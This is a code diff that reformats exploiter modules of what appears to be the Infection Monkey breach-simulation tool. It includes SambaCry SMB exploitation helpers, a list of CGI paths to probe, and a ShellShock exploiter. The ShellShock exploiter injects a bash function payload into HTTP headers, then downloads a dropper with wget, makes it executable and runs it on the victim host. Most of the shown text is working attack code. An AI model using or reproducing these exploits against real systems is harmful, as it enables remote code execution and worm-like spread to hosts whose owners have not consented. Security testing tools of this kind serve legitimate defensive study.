file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
return [
posixpath.join(*x)
for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)
]
def get_monkey_runner_bin_file(self, is_32bit):
if is_32bit:
@ -329,10 +400,12 @@ class SambaCryExploiter(HostExploiter):
return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")
def get_monkey_commandline_file(self, location):
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host,
get_monkey_depth() - 1,
SambaCryExploiter.SAMBA_PORT,
str(location)))
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
)
)
@staticmethod
def is_share_writable(smb_client, share):
@ -342,14 +415,14 @@ class SambaCryExploiter(HostExploiter):
:param share: share name
:return: True if share is writable, False otherwise.
"""
LOG.debug('Checking %s for write access' % share)
LOG.debug("Checking %s for write access" % share)
try:
tree_id = smb_client.connectTree(share)
except (impacket.smbconnection.SessionError, SessionError):
return False
try:
smb_client.openFile(tree_id, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
smb_client.openFile(tree_id, "\\", FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
writable = True
except (impacket.smbconnection.SessionError, SessionError):
writable = False
@ -369,85 +442,103 @@ class SambaCryExploiter(HostExploiter):
"""
smb_client = SMBConnection(ip, ip)
smb_client.login(
credentials["username"], credentials["password"], '', credentials["lm_hash"], credentials["ntlm_hash"])
credentials["username"],
credentials["password"],
"",
credentials["lm_hash"],
credentials["ntlm_hash"],
)
return smb_client
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
@staticmethod
def create_smb(smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition,
fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
def create_smb(
smb_client,
treeId,
fileName,
desiredAccess,
shareMode,
creationOptions,
creationDisposition,
fileAttributes,
impersonationLevel=SMB2_IL_IMPERSONATION,
securityFlags=0,
oplockLevel=SMB2_OPLOCK_LEVEL_NONE,
createContexts=None,
):
packet = smb_client.getSMBServer().SMB_PACKET()
packet['Command'] = SMB2_CREATE
packet['TreeID'] = treeId
if smb_client._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True:
packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS
packet["Command"] = SMB2_CREATE
packet["TreeID"] = treeId
if smb_client._SMBConnection._Session["TreeConnectTable"][treeId]["IsDfsShare"] is True:
packet["Flags"] = SMB2_FLAGS_DFS_OPERATIONS
smb2Create = SMB2Create()
smb2Create['SecurityFlags'] = 0
smb2Create['RequestedOplockLevel'] = oplockLevel
smb2Create['ImpersonationLevel'] = impersonationLevel
smb2Create['DesiredAccess'] = desiredAccess
smb2Create['FileAttributes'] = fileAttributes
smb2Create['ShareAccess'] = shareMode
smb2Create['CreateDisposition'] = creationDisposition
smb2Create['CreateOptions'] = creationOptions
smb2Create["SecurityFlags"] = 0
smb2Create["RequestedOplockLevel"] = oplockLevel
smb2Create["ImpersonationLevel"] = impersonationLevel
smb2Create["DesiredAccess"] = desiredAccess
smb2Create["FileAttributes"] = fileAttributes
smb2Create["ShareAccess"] = shareMode
smb2Create["CreateDisposition"] = creationDisposition
smb2Create["CreateOptions"] = creationOptions
smb2Create['NameLength'] = len(fileName) * 2
if fileName != '':
smb2Create['Buffer'] = fileName.encode('utf-16le')
smb2Create["NameLength"] = len(fileName) * 2
if fileName != "":
smb2Create["Buffer"] = fileName.encode("utf-16le")
else:
smb2Create['Buffer'] = b'\x00'
smb2Create["Buffer"] = b"\x00"
if createContexts is not None:
smb2Create['Buffer'] += createContexts
smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength']
smb2Create['CreateContextsLength'] = len(createContexts)
smb2Create["Buffer"] += createContexts
smb2Create["CreateContextsOffset"] = (
len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"]
)
smb2Create["CreateContextsLength"] = len(createContexts)
else:
smb2Create['CreateContextsOffset'] = 0
smb2Create['CreateContextsLength'] = 0
smb2Create["CreateContextsOffset"] = 0
smb2Create["CreateContextsLength"] = 0
packet['Data'] = smb2Create
packet["Data"] = smb2Create
packetID = smb_client.getSMBServer().sendSMB(packet)
ans = smb_client.getSMBServer().recvSMB(packetID)
if ans.isValidAnswer(STATUS_SUCCESS):
createResponse = SMB2Create_Response(ans['Data'])
createResponse = SMB2Create_Response(ans["Data"])
# The client MUST generate a handle for the Open, and it MUST
# return success and the generated handle to the calling application.
# In our case, str(FileID)
return str(createResponse['FileID'])
return str(createResponse["FileID"])
@staticmethod
def open_pipe(smb_client, pathName):
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
# to make things easier for the caller. Not this time ;)
treeId = smb_client.connectTree('IPC$')
LOG.debug('Triggering path: %s' % pathName)
treeId = smb_client.connectTree("IPC$")
LOG.debug("Triggering path: %s" % pathName)
if smb_client.getDialect() == SMB_DIALECT:
_, flags2 = smb_client.getSMBServer().get_flags()
pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName
pathName = pathName.encode("utf-16le") if flags2 & SMB.FLAGS2_UNICODE else pathName
ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX)
ntCreate['Parameters'] = SMBNtCreateAndX_Parameters()
ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2)
ntCreate['Parameters']['FileNameLength'] = len(pathName)
ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA
ntCreate['Parameters']['FileAttributes'] = 0
ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ
ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE
ntCreate['Parameters']['CreateOptions'] = FILE_OPEN
ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION
ntCreate['Parameters']['SecurityFlags'] = 0
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Data']['FileName'] = pathName
ntCreate["Parameters"] = SMBNtCreateAndX_Parameters()
ntCreate["Data"] = SMBNtCreateAndX_Data(flags=flags2)
ntCreate["Parameters"]["FileNameLength"] = len(pathName)
ntCreate["Parameters"]["AccessMask"] = FILE_READ_DATA
ntCreate["Parameters"]["FileAttributes"] = 0
ntCreate["Parameters"]["ShareAccess"] = FILE_SHARE_READ
ntCreate["Parameters"]["Disposition"] = FILE_NON_DIRECTORY_FILE
ntCreate["Parameters"]["CreateOptions"] = FILE_OPEN
ntCreate["Parameters"]["Impersonation"] = SMB2_IL_IMPERSONATION
ntCreate["Parameters"]["SecurityFlags"] = 0
ntCreate["Parameters"]["CreateFlags"] = 0x16
ntCreate["Data"]["FileName"] = pathName
if flags2 & SMB.FLAGS2_UNICODE:
ntCreate['Data']['Pad'] = 0x0
ntCreate["Data"]["Pad"] = 0x0
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
else:
@ -459,4 +550,5 @@ class SambaCryExploiter(HostExploiter):
shareMode=FILE_SHARE_READ,
creationOptions=FILE_OPEN,
creationDisposition=FILE_NON_DIRECTORY_FILE,
fileAttributes=0)
fileAttributes=0,
)

View File

@ -9,51 +9,58 @@ import requests
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.shellshock_resources import CGI_FILES
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.helpers import (
build_monkey_commandline,
get_monkey_depth,
get_target_monkey,
)
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.model import DROPPER_ARG
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
__author__ = 'danielg'
__author__ = "danielg"
LOG = logging.getLogger(__name__)
TIMEOUT = 2
TEST_COMMAND = '/bin/uname -a'
TEST_COMMAND = "/bin/uname -a"
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {
"Content-type": "() { :;}; echo; "
}
_attacks = {"Content-type": "() { :;}; echo; "}
_TARGET_OS_TYPE = ['linux']
_EXPLOITED_SERVICE = 'Bash'
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
def __init__(self, host):
super(ShellShockExploiter, self).__init__(host)
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.success_flag = ''.join(
choice(string.ascii_uppercase + string.digits
) for _ in range(20))
self.success_flag = "".join(
choice(string.ascii_uppercase + string.digits) for _ in range(20)
)
self.skip_exist = self._config.skip_exploit_if_file_exist
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service] for service in self.host.services if
('name' in self.host.services[service]) and (self.host.services[service]['name'] == 'http')
service: self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
}
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
'tcp-' + str(port) in candidate_services]
valid_ports = [
(port, candidate_services["tcp-" + str(port)]["data"][1])
for port in self.HTTP
if "tcp-" + str(port) in candidate_services
]
http_ports = [port[0] for port in valid_ports if not port[1]]
https_ports = [port[0] for port in valid_ports if port[1]]
LOG.info(
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
self.host, ",".join([str(port[0]) for port in valid_ports]))
"Scanning %s, ports [%s] for vulnerable CGI pages"
% (self.host, ",".join([str(port[0]) for port in valid_ports]))
)
attackable_urls = []
@ -69,39 +76,45 @@ class ShellShockExploiter(HostExploiter):
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
# we want to report all vulnerable URLs even if we didn't succeed
self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
# now try URLs until we install something on victim
for _, url, header, exploit in exploitable_urls:
LOG.info("Trying to attack host %s with %s URL" % (self.host, url))
# same attack script as sshexec
# for any failure, quit and don't try other URLs
if not self.host.os.get('type'):
if not self.host.os.get("type"):
try:
uname_os_attack = exploit + '/bin/uname -o'
uname_os_attack = exploit + "/bin/uname -o"
uname_os = self.attack_page(url, header, uname_os_attack)
if 'linux' in uname_os:
self.host.os['type'] = 'linux'
if "linux" in uname_os:
self.host.os["type"] = "linux"
else:
LOG.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception as exc:
LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
return False
if not self.host.os.get('machine'):
if not self.host.os.get("machine"):
try:
uname_machine_attack = exploit + '/bin/uname -m'
uname_machine_attack = exploit + "/bin/uname -m"
uname_machine = self.attack_page(url, header, uname_machine_attack)
if '' != uname_machine:
self.host.os['machine'] = uname_machine.lower().strip()
if "" != uname_machine:
self.host.os["machine"] = uname_machine.lower().strip()
except Exception as exc:
LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)
LOG.debug(
"Error running uname machine command on victim %r: (%s)", self.host, exc
)
return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
if self.skip_exist and (
self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
):
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
)
return True # return already infected
src_path = get_target_monkey(self.host)
@ -119,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False
download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux)
download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
download = exploit + download_command
self.attack_page(url, header,
download) # we ignore failures here since it might take more than TIMEOUT time
self.attack_page(
url, header, download
) # we ignore failures here since it might take more than TIMEOUT time
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
@ -132,30 +145,44 @@ class ShellShockExploiter(HostExploiter):
self._remove_lock_file(exploit, url, header)
if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
"ELF"
not in self.check_remote_file_exists(
url, header, exploit, dropper_target_path_linux
)
):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue
# turn the monkey into an executable
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
chmod = "/bin/chmod +x %s" % dropper_target_path_linux
run_path = exploit + chmod
self.attack_page(url, header, run_path)
T1222Telem(ScanStatus.USED, chmod, self.host).send()
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(self.host,
cmdline += build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
HTTPTools.get_port_from_url(url),
dropper_target_path_linux)
cmdline += ' & '
dropper_target_path_linux,
)
cmdline += " & "
run_path = exploit + cmdline
self.attack_page(url, header, run_path)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
cmdline,
)
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
if not (
self.check_remote_file_exists(
url, header, exploit, self._config.monkey_log_path_linux
)
):
LOG.info("Log file does not exist, monkey might not have run")
continue
self.add_executed_cmd(cmdline)
@ -169,7 +196,7 @@ class ShellShockExploiter(HostExploiter):
Checks if a remote file exists and returns the content if so
file_path should be fully qualified
"""
cmdline = '/usr/bin/head -c 4 %s' % file_path
cmdline = "/usr/bin/head -c 4 %s" % file_path
run_path = exploit + cmdline
resp = cls.attack_page(url, header, run_path)
if resp:
@ -187,24 +214,24 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Trying exploit for %s" % url)
for header, exploit in list(attacks.items()):
attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
result = self.attack_page(url, header, attack)
if self.success_flag in result:
LOG.info("URL %s looks vulnerable" % url)
return True, url, header, exploit
else:
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return False,
return (False,)
def _create_lock_file(self, exploit, url, header):
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
return False
cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
return True
def _remove_lock_file(self, exploit, url, header):
cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
cmd = exploit + "rm %s" % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
@staticmethod
@ -213,7 +240,9 @@ class ShellShockExploiter(HostExploiter):
try:
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) # noqa: DUO123
r = requests.get(
url, headers={header: attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123
result = r.content.decode()
return result
except requests.exceptions.RequestException as exc:
@ -226,9 +255,9 @@ class ShellShockExploiter(HostExploiter):
Checks if which urls exist
:return: Sequence of URLs to try and attack
"""
attack_path = 'http://'
attack_path = "http://"
if is_https:
attack_path = 'https://'
attack_path = "https://"
attack_path = attack_path + str(host) + ":" + str(port)
reqs = []
timeout = False
@ -240,7 +269,9 @@ class ShellShockExploiter(HostExploiter):
timeout = True
break
if timeout:
LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.")
LOG.debug(
"Some connections timed out while sending request to potentially vulnerable urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]

View File

@ -2,407 +2,407 @@
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
CGI_FILES = (
r'/',
r'/admin.cgi',
r'/administrator.cgi',
r'/agora.cgi',
r'/aktivate/cgi-bin/catgy.cgi',
r'/analyse.cgi',
r'/apps/web/vs_diag.cgi',
r'/axis-cgi/buffer/command.cgi',
r'/b2-include/b2edit.showposts.php',
r'/bandwidth/index.cgi',
r'/bigconf.cgi',
r'/cartcart.cgi',
r'/cart.cgi',
r'/ccbill/whereami.cgi',
r'/cgi-bin/14all-1.1.cgi',
r'/cgi-bin/14all.cgi',
r'/cgi-bin/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp4.cgi',
r'/cgi-bin/addbanner.cgi',
r'/cgi-bin/add_ftp.cgi',
r'/cgi-bin/adduser.cgi',
r'/cgi-bin/admin/admin.cgi',
r'/cgi-bin/admin.cgi',
r'/cgi-bin/admin/getparam.cgi',
r'/cgi-bin/adminhot.cgi',
r'/cgi-bin/admin.pl',
r'/cgi-bin/admin/setup.cgi',
r'/cgi-bin/adminwww.cgi',
r'/cgi-bin/af.cgi',
r'/cgi-bin/aglimpse.cgi',
r'/cgi-bin/alienform.cgi',
r'/cgi-bin/AnyBoard.cgi',
r'/cgi-bin/architext_query.cgi',
r'/cgi-bin/astrocam.cgi',
r'/cgi-bin/AT-admin.cgi',
r'/cgi-bin/AT-generate.cgi',
r'/cgi-bin/auction/auction.cgi',
r'/cgi-bin/auktion.cgi',
r'/cgi-bin/ax-admin.cgi',
r'/cgi-bin/ax.cgi',
r'/cgi-bin/axs.cgi',
r'/cgi-bin/badmin.cgi',
r'/cgi-bin/banner.cgi',
r'/cgi-bin/bannereditor.cgi',
r'/cgi-bin/bb-ack.sh',
r'/cgi-bin/bb-histlog.sh',
r'/cgi-bin/bb-hist.sh',
r'/cgi-bin/bb-hostsvc.sh',
r'/cgi-bin/bb-replog.sh',
r'/cgi-bin/bb-rep.sh',
r'/cgi-bin/bbs_forum.cgi',
r'/cgi-bin/bigconf.cgi',
r'/cgi-bin/bizdb1-search.cgi',
r'/cgi-bin/blog/mt-check.cgi',
r'/cgi-bin/blog/mt-load.cgi',
r'/cgi-bin/bnbform.cgi',
r'/cgi-bin/book.cgi',
r'/cgi-bin/boozt/admin/index.cgi',
r'/cgi-bin/bsguest.cgi',
r'/cgi-bin/bslist.cgi',
r'/cgi-bin/build.cgi',
r'/cgi-bin/bulk/bulk.cgi',
r'/cgi-bin/cached_feed.cgi',
r'/cgi-bin/cachemgr.cgi',
r'/cgi-bin/calendar/index.cgi',
r'/cgi-bin/cartmanager.cgi',
r'/cgi-bin/cbmc/forums.cgi',
r'/cgi-bin/ccvsblame.cgi',
r'/cgi-bin/c_download.cgi',
r'/cgi-bin/cgforum.cgi',
r'/cgi-bin/.cgi',
r'/cgi-bin/cgi_process',
r'/cgi-bin/classified.cgi',
r'/cgi-bin/classifieds.cgi',
r'/cgi-bin/classifieds/classifieds.cgi',
r'/cgi-bin/classifieds/index.cgi',
r'/cgi-bin/.cobalt/alert/service.cgi',
r'/cgi-bin/.cobalt/message/message.cgi',
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
r'/cgi-bin/commandit.cgi',
r'/cgi-bin/commerce.cgi',
r'/cgi-bin/common/listrec.pl',
r'/cgi-bin/compatible.cgi',
r'/cgi-bin/Count.cgi',
r'/cgi-bin/csChatRBox.cgi',
r'/cgi-bin/csGuestBook.cgi',
r'/cgi-bin/csLiveSupport.cgi',
r'/cgi-bin/CSMailto.cgi',
r'/cgi-bin/CSMailto/CSMailto.cgi',
r'/cgi-bin/csNews.cgi',
r'/cgi-bin/csNewsPro.cgi',
r'/cgi-bin/csPassword.cgi',
r'/cgi-bin/csPassword/csPassword.cgi',
r'/cgi-bin/csSearch.cgi',
r'/cgi-bin/csv_db.cgi',
r'/cgi-bin/cvsblame.cgi',
r'/cgi-bin/cvslog.cgi',
r'/cgi-bin/cvsquery.cgi',
r'/cgi-bin/cvsqueryform.cgi',
r'/cgi-bin/day5datacopier.cgi',
r'/cgi-bin/day5datanotifier.cgi',
r'/cgi-bin/db_manager.cgi',
r'/cgi-bin/dbman/db.cgi',
r'/cgi-bin/dcforum.cgi',
r'/cgi-bin/dcshop.cgi',
r'/cgi-bin/dfire.cgi',
r'/cgi-bin/diagnose.cgi',
r'/cgi-bin/dig.cgi',
r'/cgi-bin/directorypro.cgi',
r'/cgi-bin/download.cgi',
r'/cgi-bin/e87_Ba79yo87.cgi',
r'/cgi-bin/emu/html/emumail.cgi',
r'/cgi-bin/emumail.cgi',
r'/cgi-bin/emumail/emumail.cgi',
r'/cgi-bin/enter.cgi',
r'/cgi-bin/environ.cgi',
r'/cgi-bin/ezadmin.cgi',
r'/cgi-bin/ezboard.cgi',
r'/cgi-bin/ezman.cgi',
r'/cgi-bin/ezshopper2/loadpage.cgi',
r'/cgi-bin/ezshopper3/loadpage.cgi',
r'/cgi-bin/ezshopper/loadpage.cgi',
r'/cgi-bin/ezshopper/search.cgi',
r'/cgi-bin/faqmanager.cgi',
r'/cgi-bin/FileSeek2.cgi',
r'/cgi-bin/FileSeek.cgi',
r'/cgi-bin/finger.cgi',
r'/cgi-bin/flexform.cgi',
r'/cgi-bin/fom.cgi',
r'/cgi-bin/fom/fom.cgi',
r'/cgi-bin/FormHandler.cgi',
r'/cgi-bin/FormMail.cgi',
r'/cgi-bin/gbadmin.cgi',
r'/cgi-bin/gbook/gbook.cgi',
r'/cgi-bin/generate.cgi',
r'/cgi-bin/getdoc.cgi',
r'/cgi-bin/gH.cgi',
r'/cgi-bin/gm-authors.cgi',
r'/cgi-bin/gm.cgi',
r'/cgi-bin/gm-cplog.cgi',
r'/cgi-bin/guestbook.cgi',
r'/cgi-bin/handler',
r'/cgi-bin/handler.cgi',
r'/cgi-bin/handler/netsonar',
r'/cgi-bin/hitview.cgi',
r'/cgi-bin/hsx.cgi',
r'/cgi-bin/html2chtml.cgi',
r'/cgi-bin/html2wml.cgi',
r'/cgi-bin/htsearch.cgi',
r'/cgi-bin/hw.sh', # testing
r'/cgi-bin/icat',
r'/cgi-bin/if/admin/nph-build.cgi',
r'/cgi-bin/ikonboard/help.cgi',
r'/cgi-bin/ImageFolio/admin/admin.cgi',
r'/cgi-bin/imageFolio.cgi',
r'/cgi-bin/index.cgi',
r'/cgi-bin/infosrch.cgi',
r'/cgi-bin/jammail.pl',
r'/cgi-bin/journal.cgi',
r'/cgi-bin/lastlines.cgi',
r'/cgi-bin/loadpage.cgi',
r'/cgi-bin/login.cgi',
r'/cgi-bin/logit.cgi',
r'/cgi-bin/log-reader.cgi',
r'/cgi-bin/lookwho.cgi',
r'/cgi-bin/lwgate.cgi',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/magiccard.cgi',
r'/cgi-bin/mail/emumail.cgi',
r'/cgi-bin/maillist.cgi',
r'/cgi-bin/mailnews.cgi',
r'/cgi-bin/mail/nph-mr.cgi',
r'/cgi-bin/main.cgi',
r'/cgi-bin/main_menu.pl',
r'/cgi-bin/man.sh',
r'/cgi-bin/mini_logger.cgi',
r'/cgi-bin/mmstdod.cgi',
r'/cgi-bin/moin.cgi',
r'/cgi-bin/mojo/mojo.cgi',
r'/cgi-bin/mrtg.cgi',
r'/cgi-bin/mt.cgi',
r'/cgi-bin/mt/mt.cgi',
r'/cgi-bin/mt/mt-check.cgi',
r'/cgi-bin/mt/mt-load.cgi',
r'/cgi-bin/mt-static/mt-check.cgi',
r'/cgi-bin/mt-static/mt-load.cgi',
r'/cgi-bin/musicqueue.cgi',
r'/cgi-bin/myguestbook.cgi',
r'/cgi-bin/.namazu.cgi',
r'/cgi-bin/nbmember.cgi',
r'/cgi-bin/netauth.cgi',
r'/cgi-bin/netpad.cgi',
r'/cgi-bin/newsdesk.cgi',
r'/cgi-bin/nlog-smb.cgi',
r'/cgi-bin/nph-emumail.cgi',
r'/cgi-bin/nph-exploitscanget.cgi',
r'/cgi-bin/nph-publish.cgi',
r'/cgi-bin/nph-test.cgi',
r'/cgi-bin/pagelog.cgi',
r'/cgi-bin/pbcgi.cgi',
r'/cgi-bin/perlshop.cgi',
r'/cgi-bin/pfdispaly.cgi',
r'/cgi-bin/pfdisplay.cgi',
r'/cgi-bin/phf.cgi',
r'/cgi-bin/photo/manage.cgi',
r'/cgi-bin/photo/protected/manage.cgi',
r'/cgi-bin/php-cgi',
r'/cgi-bin/php.cgi',
r'/cgi-bin/php.fcgi',
r'/cgi-bin/ping.sh',
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
r'/cgi-bin/pollssi.cgi',
r'/cgi-bin/postcards.cgi',
r'/cgi-bin/powerup/r.cgi',
r'/cgi-bin/printenv',
r'/cgi-bin/probecontrol.cgi',
r'/cgi-bin/profile.cgi',
r'/cgi-bin/publisher/search.cgi',
r'/cgi-bin/quickstore.cgi',
r'/cgi-bin/quizme.cgi',
r'/cgi-bin/ratlog.cgi',
r'/cgi-bin/r.cgi',
r'/cgi-bin/register.cgi',
r'/cgi-bin/replicator/webpage.cgi/',
r'/cgi-bin/responder.cgi',
r'/cgi-bin/robadmin.cgi',
r'/cgi-bin/robpoll.cgi',
r'/cgi-bin/rtpd.cgi',
r'/cgi-bin/sbcgi/sitebuilder.cgi',
r'/cgi-bin/scoadminreg.cgi',
r'/cgi-bin-sdb/printenv',
r'/cgi-bin/sdbsearch.cgi',
r'/cgi-bin/search',
r'/cgi-bin/search.cgi',
r'/cgi-bin/search/search.cgi',
r'/cgi-bin/sendform.cgi',
r'/cgi-bin/shop.cgi',
r'/cgi-bin/shopper.cgi',
r'/cgi-bin/shopplus.cgi',
r'/cgi-bin/showcheckins.cgi',
r'/cgi-bin/simplestguest.cgi',
r'/cgi-bin/simplestmail.cgi',
r'/cgi-bin/smartsearch.cgi',
r'/cgi-bin/smartsearch/smartsearch.cgi',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/sojourn.cgi',
r'/cgi-bin/spin_client.cgi',
r'/cgi-bin/start.cgi',
r'/cgi-bin/status',
r'/cgi-bin/status_cgi',
r'/cgi-bin/store/agora.cgi',
r'/cgi-bin/store.cgi',
r'/cgi-bin/store/index.cgi',
r'/cgi-bin/survey.cgi',
r'/cgi-bin/sync.cgi',
r'/cgi-bin/talkback.cgi',
r'/cgi-bin/technote/main.cgi',
r'/cgi-bin/test2.pl',
r'/cgi-bin/test-cgi',
r'/cgi-bin/test.cgi',
r'/cgi-bin/testing_whatever',
r'/cgi-bin/test/test.cgi',
r'/cgi-bin/tidfinder.cgi',
r'/cgi-bin/tigvote.cgi',
r'/cgi-bin/title.cgi',
r'/cgi-bin/top.cgi',
r'/cgi-bin/traffic.cgi',
r'/cgi-bin/troops.cgi',
r'/cgi-bin/ttawebtop.cgi/',
r'/cgi-bin/ultraboard.cgi',
r'/cgi-bin/upload.cgi',
r'/cgi-bin/urlcount.cgi',
r'/cgi-bin/viewcvs.cgi',
r'/cgi-bin/view_help.cgi',
r'/cgi-bin/viralator.cgi',
r'/cgi-bin/virgil.cgi',
r'/cgi-bin/vote.cgi',
r'/cgi-bin/vpasswd.cgi',
r'/cgi-bin/way-board.cgi',
r'/cgi-bin/way-board/way-board.cgi',
r'/cgi-bin/webbbs.cgi',
r'/cgi-bin/webcart/webcart.cgi',
r'/cgi-bin/webdist.cgi',
r'/cgi-bin/webif.cgi',
r'/cgi-bin/webmail/html/emumail.cgi',
r'/cgi-bin/webmap.cgi',
r'/cgi-bin/webspirs.cgi',
r'/cgi-bin/Web_Store/web_store.cgi',
r'/cgi-bin/whois.cgi',
r'/cgi-bin/whois_raw.cgi',
r'/cgi-bin/whois/whois.cgi',
r'/cgi-bin/wrap',
r'/cgi-bin/wrap.cgi',
r'/cgi-bin/wwwboard.cgi.cgi',
r'/cgi-bin/YaBB/YaBB.cgi',
r'/cgi-bin/zml.cgi',
r'/cgi-mod/index.cgi',
r'/cgis/wwwboard/wwwboard.cgi',
r'/cgi-sys/addalink.cgi',
r'/cgi-sys/defaultwebpage.cgi',
r'/cgi-sys/domainredirect.cgi',
r'/cgi-sys/entropybanner.cgi',
r'/cgi-sys/entropysearch.cgi',
r'/cgi-sys/FormMail-clone.cgi',
r'/cgi-sys/helpdesk.cgi',
r'/cgi-sys/mchat.cgi',
r'/cgi-sys/randhtml.cgi',
r'/cgi-sys/realhelpdesk.cgi',
r'/cgi-sys/realsignup.cgi',
r'/cgi-sys/signup.cgi',
r'/connector.cgi',
r'/cp/rac/nsManager.cgi',
r'/create_release.sh',
r'/CSNews.cgi',
r'/csPassword.cgi',
r'/dcadmin.cgi',
r'/dcboard.cgi',
r'/dcforum.cgi',
r'/dcforum/dcforum.cgi',
r'/debuff.cgi',
r'/debug.cgi',
r'/details.cgi',
r'/edittag/edittag.cgi',
r'/emumail.cgi',
r'/enter_buff.cgi',
r'/enter_bug.cgi',
r'/ez2000/ezadmin.cgi',
r'/ez2000/ezboard.cgi',
r'/ez2000/ezman.cgi',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo2',
r'/fcgi-bin/echo2',
r'/Gozila.cgi',
r'/hitmatic/analyse.cgi',
r'/hp_docs/cgi-bin/index.cgi',
r'/html/cgi-bin/cgicso',
r'/html/cgi-bin/cgicso',
r'/index.cgi',
r'/info.cgi',
